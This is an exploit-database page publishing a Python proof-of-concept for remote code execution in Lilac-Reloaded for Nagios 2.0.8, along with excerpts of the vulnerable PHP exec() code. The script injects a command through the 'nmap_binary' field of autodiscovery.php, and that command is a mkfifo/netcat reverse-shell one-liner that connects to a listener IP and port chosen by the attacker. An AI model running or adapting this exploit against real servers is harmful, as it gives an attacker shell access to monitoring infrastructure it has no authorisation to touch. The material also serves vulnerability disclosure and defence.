Lilac-Reloaded For Nagios 2.0.8 Remote Code Execution

2023.04.23
Credit: Zoltan Padanyi
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/env python """ # Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 2023-04-13 # Exploit Author: max / Zoltan Padanyi # Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit # Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download # Version: 2.0.8 # Tested on: Debian 7.6 # CVE : N/A The autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ; Use at your own risk! RCA - wild exec is ongoing without any filtering in library/Net/Traceroute.php 181 function _setTraceroutePath($sysname) 182 { 183 $status = ''; 184 $output = array(); 185 $traceroute_path = ''; 186 187 if ("windows" == $sysname) { 188 return "tracert"; 189 } else { 190 $traceroute_path = exec("which traceroute", $output, $status); [...] 257 function traceroute($host) 258 { 259 260 $argList = $this->_createArgList(); 261 $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1]; 262 exec($cmd, $this->_result); """ import requests import argparse parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True) parser.add_argument("-i", "--ip", help="Listener IP", required=True) parser.add_argument("-p", "--port", help="Listener port", required=True, type=int) args = parser.parse_args() rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;" body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"} try: r = requests.get(args.url) if r.ok: print("[+] URL looks good...moving forward...") print("[+] Sending exploit in...") r = requests.post(args.url,data=body) if r.ok: print("[+] Got HTTP 200, check your listener!") else: print("[-] Some kind of error happened, check the http response below!") print(r.text) except Exception as e: print("General exception: " + str(e))


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top